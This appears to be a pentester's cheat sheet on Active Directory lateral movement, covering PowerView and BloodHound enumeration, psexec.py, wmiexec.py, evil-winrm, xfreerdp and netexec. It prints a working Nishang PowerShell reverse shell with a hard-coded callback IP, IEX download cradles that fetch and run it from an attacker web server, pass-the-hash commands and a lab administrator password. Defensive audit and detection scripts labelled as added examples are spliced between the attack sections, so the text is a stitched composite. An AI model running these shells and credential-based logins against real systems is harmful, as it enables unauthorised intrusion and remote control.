
Enumeration

An operator with control over a domain account can gather most of the domain information. This includes which domain user accounts can connect remotely to domain-joined hosts because of rights granted to them directly or through group membership.

Attackers often overlook this kind of prize: a compromised domain user account that is not a local admin on any domain-joined host but does have remote access to one or more of them. That account can be used to establish a remote connection and proceed with further actions such as pillaging, privilege escalation and so on.

These user accounts have such rights because they belong to groups such as Remote Desktop Users (RDP) or Remote Management Users (WinRM), or because they hold the sysadmin role on an MSSQL instance.

Therefore, we should always enumerate these remote accesses and not overlook any of them, as they can make the difference in an assessment where every other lead has run out.

The easiest and most efficient way to do so is BloodHound, as it has several edges related to remote connections.

However, if we want to be more manual, PowerView, along with PowerUpSQL, is the way to go.

RDP
Powerview

Powerview.ps1

Get-NetLocalGroupMember

One Domain Computer

Get-NetLocalGroupMember -ComputerName <TARGET> -GroupName "Remote Desktop Users"

All Domain Computers

Get-DomainComputer | % { Get-NetLocalGroupMember -Computername $_.name -GroupName "Remote Desktop Users" }
BloodHound

BloodHound CE


WinRM (MS-PSRP)
Powerview

Powerview.ps1

Get-NetLocalGroupMember

One Domain Computer

Get-NetLocalGroupMember -ComputerName <TARGET> -GroupName "Remote Management Users"

All Domain Computers

Get-DomainComputer | % { Get-NetLocalGroupMember -Computername $_.name -GroupName "Remote Management Users" }
BloodHound

BloodHound CE


BloodHound Cypher Query

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2
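The RDP and WinRM sections above enumerate the two local groups one host at a time. The following is an added audit script (not from the original page, PowerView or BloodHound) that answers the same question across the domain with built-in cmdlets and then expands nested domain groups, so the report lists the actual accounts and how many hosts each one can reach. It assumes the ActiveDirectory module is installed, that the auditing account may run Invoke-Command (WinRM) against the computers, and that the local group names are the built-in "Remote Desktop Users" and "Remote Management Users"; the output file name is arbitrary.

```powershell
# Added audit example: not from the original page, PowerView or BloodHound.
# Assumes the ActiveDirectory module and WinRM access to the domain computers.
Import-Module ActiveDirectory

$groups = 'Remote Desktop Users', 'Remote Management Users'

# Enabled computers that currently answer a ping; unreachable hosts are skipped.
$computers = Get-ADComputer -Filter 'Enabled -eq $true' -Properties DNSHostName |
    Select-Object -ExpandProperty DNSHostName |
    Where-Object { Test-Connection -ComputerName $_ -Count 1 -Quiet }

# Query both local groups on every host; Invoke-Command fans out in parallel.
$members = Invoke-Command -ComputerName $computers -ErrorAction SilentlyContinue -ArgumentList (,$groups) -ScriptBlock {
    param([string[]] $GroupNames)
    foreach ($g in $GroupNames) {
        # PrincipalSource filters out purely local accounts; only domain principals matter here.
        Get-LocalGroupMember -Group $g -ErrorAction SilentlyContinue |
            Where-Object { $_.PrincipalSource -eq 'ActiveDirectory' } |
            ForEach-Object {
                [pscustomobject]@{
                    Computer    = $env:COMPUTERNAME
                    LocalGroup  = $g
                    Member      = $_.Name          # DOMAIN\sAMAccountName
                    ObjectClass = $_.ObjectClass   # User or Group
                }
            }
    }
}

# Flatten: a domain group granted the right is expanded to its recursive user members.
$report = foreach ($m in $members) {
    $sam = $m.Member.Split('\')[-1]
    if ($m.ObjectClass -eq 'Group') {
        Get-ADGroupMember -Identity $sam -Recursive |
            Where-Object { $_.objectClass -eq 'user' } |
            ForEach-Object {
                [pscustomobject]@{ Computer = $m.Computer; LocalGroup = $m.LocalGroup; Account = $_.SamAccountName; Via = $m.Member }
            }
    } else {
        [pscustomobject]@{ Computer = $m.Computer; LocalGroup = $m.LocalGroup; Account = $sam; Via = 'direct' }
    }
}

# Accounts that reach the most hosts first: these are the non-admin accounts the text says get overlooked.
$report | Group-Object Account | Sort-Object Count -Descending |
    Select-Object Name, Count, @{ n = 'Hosts'; e = { ($_.Group.Computer | Sort-Object -Unique) -join ', ' } } |
    Format-Table -AutoSize

# Full per-host detail for review or diffing against the previous run (file name is arbitrary).
$report | Export-Csv -Path .\remote-access-audit.csv -NoTypeInformation
```

Run it from a domain-joined admin workstation; the "Via" column shows whether the right came from direct membership or from a domain group, which is usually where the surprising grants hide.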
MSSQL
PowerUpSQL


  • Setup

Fileless

IEX (New-Object Net.WebClient).downloadString('https://github.com/NetSPI/PowerUpSQL/raw/refs/heads/master/PowerUpSQL.ps1')

Touching Disk

IWR -UseBasicParsing -Uri 'https://github.com/NetSPI/PowerUpSQL/raw/refs/heads/master/PowerUpSQL.ps1' -OutFile '.\PowerUpSQL.ps1'
Import-Module '.\PowerUpSQL.ps1'
  • Usage

Get all MSSQL Instances in a Domain

Get-SQLInstanceDomain
BloodHound

BloodHound CE


BloodHound Cypher Query

MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2
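Get-SQLInstanceDomain finds instances by reading MSSQLSvc service principal names from Active Directory. As an added example (not from the original page or from PowerUpSQL), the script below does the same discovery with the ActiveDirectory module and then lists every login holding the sysadmin role on each instance, which is the right the SQLAdmin edge above represents. It assumes the ActiveDirectory module, Windows PowerShell 5.1 (for System.Data.SqlClient) and a Windows login for the auditing account on each instance; the function names are my own.

```powershell
# Added audit example: not from the original page or from PowerUpSQL.
# Assumes the ActiveDirectory module, Windows PowerShell 5.1 and integrated auth on the instances.
Import-Module ActiveDirectory

function Get-SqlInstanceFromSpn {
    # Every account (user or computer) carrying an MSSQLSvc SPN advertises an instance.
    Get-ADObject -LDAPFilter '(servicePrincipalName=MSSQLSvc/*)' -Properties servicePrincipalName |
        ForEach-Object {
            $acct = $_
            $acct.servicePrincipalName | Where-Object { $_ -like 'MSSQLSvc/*' } | ForEach-Object {
                # SPN forms: MSSQLSvc/host.fqdn:1433 (port) or MSSQLSvc/host.fqdn:INSTANCENAME
                $target = $_.Substring('MSSQLSvc/'.Length)
                $hostName, $portOrInst = $target -split ':', 2
                if (-not $portOrInst)               { $inst = $hostName }
                elseif ($portOrInst -match '^\d+$') { $inst = "$hostName,$portOrInst" }
                else                                { $inst = "$hostName\$portOrInst" }
                [pscustomobject]@{ Instance = $inst; ServiceAccount = $acct.Name }
            }
        } | Sort-Object Instance -Unique
}

function Get-SqlSysadminMember {
    param([Parameter(Mandatory)][string] $Instance)
    # Integrated auth only: no passwords on the command line or in the shell history.
    $conn = New-Object System.Data.SqlClient.SqlConnection("Server=$Instance;Integrated Security=True;Connect Timeout=5")
    try {
        $conn.Open()
        $cmd = $conn.CreateCommand()
        # IS_SRVROLEMEMBER evaluates each server principal against the fixed sysadmin role.
        $cmd.CommandText = "SELECT name, type_desc FROM sys.server_principals WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1"
        $reader = $cmd.ExecuteReader()
        while ($reader.Read()) {
            [pscustomobject]@{ Instance = $Instance; Sysadmin = $reader['name']; Type = $reader['type_desc'] }
        }
    } catch {
        # Instances that refuse the auditing account still show up in the discovery list above.
        Write-Warning "$Instance`: $($_.Exception.Message)"
    } finally {
        $conn.Dispose()
    }
}

$instances = Get-SqlInstanceFromSpn
$instances | Format-Table -AutoSize
$instances | ForEach-Object { Get-SqlSysadminMember -Instance $_.Instance } | Format-Table -AutoSize
```

Any WINDOWS_GROUP row in the second table is worth expanding with Get-ADGroupMember, since a broad domain group mapped to sysadmin is exactly what makes a low-privileged user an SQLAdmin in BloodHound.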

HTTP

Nishang PS Reverse Shell

Nishang Reverse Shell Oneliner

  • From the Attacker 🗡️
Reverse Shell

Modify the Oneliner IP Address and Port as follows

$client = New-Object System.Net.Sockets.TCPClient('10.10.16.30',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Simple HTTP Server

Check Simple HTTP Servers here

Setup a Web Server to share the Reverse Shell

python3 -m http.server 8888
Listening Socket

Check Listening Sockets → Reference I  ⚡  Reference II

Listen in at the port set in the Reverse Shell Script

rlwrap nc -nlvp 1234
  • From the Target 🎯
Reverse Connection

Request the reverse shell: (New-Object Net.WebClient).DownloadString('<URL>')

Execute it with IEX or Invoke-Expression

Target
start /b powershell.exe -Command IEX (New-Object Net.Webclient).DownloadString('http://10.10.16.30:443/reverse_shell.ps1')

PS v3.0 or >

Target
IEX (IWR -UseBasicParsing -Uri '<URL>') # Or Invoke-Expression (Invoke-WebRequest '<URL>')

SMB

PSExec

This tool from Impacket can be used to establish a bind shell if the authenticated user has administrative privileges on the workstation or domain computer

CMD

This tool allows an attacker to get a shell with cmd.exe

psexec.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET>

PS

Sometimes it gets tricky to launch a powershell.exe instance. We can accomplish this simply by establishing a reverse shell via Invoke-Expression, aka IEX

Reverse Shell Payload

Nishang Reverse Shell Oneliner

curl --silent --request GET --location --output <FILE> "https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Shells/Invoke-PowerShellTcpOneLine.ps1"
Simple HTTP Server
python3 -m http.server <PORT>
Listening Socket
rlwrap -CaR nc -nlvp <PORT>
HTTP Request From Target and Reverse Shell Execution
psexec.py -dc-ip 10.129.135.22 active.htb/Administrator:Ticketmaster1968@active.htb "powershell.exe -Exec Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.34:8888/reverse.ps1')"

RPC

WMIExec
wmiexec.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET_IP>

WinRM

EvilWinRM
Password Auth

Reference

evil-winrm --ip <TARGET> --port <PORT> --user <USER> --password <PASSWORD>
Pass The Hash
evil-winrm --ip <TARGET> --port <PORT> --user <USER> --hash <NTHASH>
SSL Enabled
evil-winrm --ip <TARGET> --port <PORT> --ssl --user <USER> --password <PASSWORD>
Upload and Download a File
PS> upload <LOCAL_PATH> <TARGET_FULL_PATH> # Upload
PS> download <TARGET_FULL_PATH> <LOCAL_PATH> # Download
Invoke-Command
Creation of Credentials Object
$user = '<DOMAIN>\<USERNAME>'
$password = ConvertTo-SecureString -AsPlainText -Force -String '<PLAIN_PASSWORD>'
$cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$password
Command Execution as Another User
Invoke-Command -ComputerName <HOSTNAME> -Credential $cred -ScriptBlock { <COMMAND> }
Enter-PSSession
$user = '<DOMAIN>\<USERNAME>'
$password = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWORD>'
$cred = New-Object -TypeName System.Management.Automation.PSCredential ($user, $password)
Enter-PSSession -ComputerName <HOSTNAME> -Credential $cred
Netexec

Reference

Remote Command Execution
  • CMD
netexec winrm <TARGET> -d <DOMAIN> --username <USER> --password <PASSWORD> -x <COMMAND>
  • PS
netexec winrm <TARGET> -d <DOMAIN> --username <USER> --password <PASSWORD> -X <COMMAND>

RDP

RDesktop
rdesktop -u <USER> <TARGET>
rdesktop -d <DOMAIN> -u <USER> -p <PASSWORD> <TARGET>
XFreeRDP
Password Auth
xfreerdp /u:<DOMAIN>\<USER> /p:<PASSWORD> /v:<TARGET>:<PORT>
Pass The Hash
xfreerdp /u:<DOMAIN>\<USER> /pth:<NTHASH> /v:<TARGET>:<PORT>
Skip Certificate Validation
xfreerdp /u:<USER> /p:<PASSWORD> /v:<TARGET>:<PORT> /cert:ignore
Remmina
CLI
remmina -c rdp://<USER>:<PASSWORD>@<TARGET>:<PORT>
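Each of the channels covered in the SMB, RPC, WinRM and RDP sections above, and the download cradle from the HTTP section, leaves a distinct trail in the Windows event logs. The following is an added detection example (not from the original page or any of the tools it lists) that encodes those patterns as rules and runs them over a small constructed sample. The event IDs, logon types, process names and the Properties[] positions for 4624 are real Windows values; the sample records, hostnames, accounts and the 203.0.113.5 address are made up, and the two function names are my own.

```powershell
# Added detection example: not from the original page or any tool it lists.
# Event IDs, logon types and process names are real; the sample at the bottom is constructed.

function Get-LateralMovementIndicator {
    # Input objects carry Id plus a Props hashtable (see ConvertFrom-LogonEvent for real records).
    param([Parameter(ValueFromPipeline, Mandatory)] [pscustomobject] $Event)
    process {
        $p = $Event.Props
        $rule = $null
        switch ($Event.Id) {
            4624 {  # Security: successful logon
                if ($p.LogonType -eq 10) { $rule = 'RDP logon (type 10)' }
                elseif ($p.LogonType -eq 3 -and $p.AuthPackage -eq 'NTLM') {
                    # psexec.py, wmiexec.py and evil-winrm authenticate with NTLM by default, while
                    # domain members normally use Kerberos, so NTLM network logons deserve a look (pass-the-hash).
                    $rule = 'NTLM network logon (SMB/WMI/WinRM; check for pass-the-hash)'
                }
            }
            7045 {  # System: service installed. PsExec-style tools copy a binary to ADMIN$ (the Windows
                    # directory) and register it; Sysinternals names it PSEXESVC, impacket uses random names.
                if ($p.ServiceName -like 'PSEXESVC*' -or $p.ImagePath -match '^(%SystemRoot%|C:\\Windows)\\[^\\]+\.exe') {
                    $rule = "Service binary dropped in the Windows directory: $($p.ServiceName) -> $($p.ImagePath)"
                }
            }
            4688 {  # Security: process creation (command-line auditing must be enabled for CommandLine)
                if ($p.ParentImage -match 'wsmprovhost\.exe$') { $rule = "Spawned by WinRM host: $($p.CommandLine)" }
                elseif ($p.ParentImage -match 'wmiprvse\.exe$') { $rule = "Spawned by WMI provider host: $($p.CommandLine)" }
                elseif ($p.CommandLine -match 'DownloadString|Invoke-WebRequest|\bIWR\b|Invoke-Expression|\bIEX\b') {
                    $rule = "PowerShell download cradle: $($p.CommandLine)"
                }
            }
        }
        if ($rule) { [pscustomobject]@{ Time = $Event.Time; Host = $Event.Host; Account = $p.Account; Rule = $rule } }
    }
}

function ConvertFrom-LogonEvent {
    # Adapter for real records: Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624 } | ConvertFrom-LogonEvent
    # Properties[] positions for 4624: 5 TargetUserName, 6 TargetDomainName, 8 LogonType, 10 AuthenticationPackageName.
    param([Parameter(ValueFromPipeline)] [System.Diagnostics.Eventing.Reader.EventLogRecord] $Record)
    process {
        $v = $Record.Properties
        [pscustomobject]@{
            Time  = $Record.TimeCreated; Host = $Record.MachineName; Id = $Record.Id
            Props = @{ Account = "$($v[6].Value)\$($v[5].Value)"; LogonType = [int]$v[8].Value; AuthPackage = $v[10].Value }
        }
    }
}

# Constructed sample: one account moving through three hosts, plus one benign console logon (type 2).
$sample = @(
    [pscustomobject]@{ Time = '09:01:10'; Host = 'WS01'; Id = 4624; Props = @{ Account = 'CORP\jdoe'; LogonType = 3; AuthPackage = 'NTLM' } }
    [pscustomobject]@{ Time = '09:01:11'; Host = 'WS01'; Id = 7045; Props = @{ Account = 'CORP\jdoe'; ServiceName = 'PSEXESVC'; ImagePath = '%SystemRoot%\PSEXESVC.exe' } }
    [pscustomobject]@{ Time = '09:02:30'; Host = 'WS02'; Id = 4688; Props = @{ Account = 'CORP\jdoe'; ParentImage = 'C:\Windows\System32\wsmprovhost.exe'; CommandLine = 'cmd.exe /c whoami' } }
    [pscustomobject]@{ Time = '09:03:05'; Host = 'WS02'; Id = 4688; Props = @{ Account = 'CORP\jdoe'; ParentImage = 'C:\Windows\System32\cmd.exe'; CommandLine = "powershell.exe -Command IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5:8888/x.ps1')" } }
    [pscustomobject]@{ Time = '09:04:00'; Host = 'WS03'; Id = 4624; Props = @{ Account = 'CORP\jdoe'; LogonType = 10; AuthPackage = 'Kerberos' } }
    [pscustomobject]@{ Time = '09:05:00'; Host = 'WS03'; Id = 4624; Props = @{ Account = 'CORP\asmith'; LogonType = 2; AuthPackage = 'Kerberos' } }
)

$sample | Get-LateralMovementIndicator | Format-Table -AutoSize
```

The rules are deliberately narrow: a single NTLM network logon is normal on many networks, but the same account producing a service install, a WinRM-spawned process and an RDP logon on three hosts within minutes is the sequence this page's tooling generates, and correlating on Account and Time is what turns the individual hits into an alert.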

MSSQL

See here for more information

PowerUpSQL


Run Custom Queries on a given MSSQL Instance
Get-SQLQuery -Verbose -Instance '<TARGET>,<PORT>' -username '<DOMAIN>\<USER>' -password '<PASSWD>' -query '<QUERY>'